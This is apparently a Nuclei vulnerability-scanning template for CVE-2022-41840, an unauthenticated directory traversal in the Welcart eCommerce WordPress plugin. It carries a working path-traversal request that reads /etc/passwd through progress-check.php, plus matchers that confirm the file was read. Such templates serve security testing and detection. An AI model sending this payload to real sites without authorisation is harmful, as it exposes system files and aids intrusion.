id: CVE-2022-41840 info: name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal author: theamanrawat severity: high reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 classification: cve-id: CVE-2022-41840 metadata: verified: true tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/json" - type: status status: - 200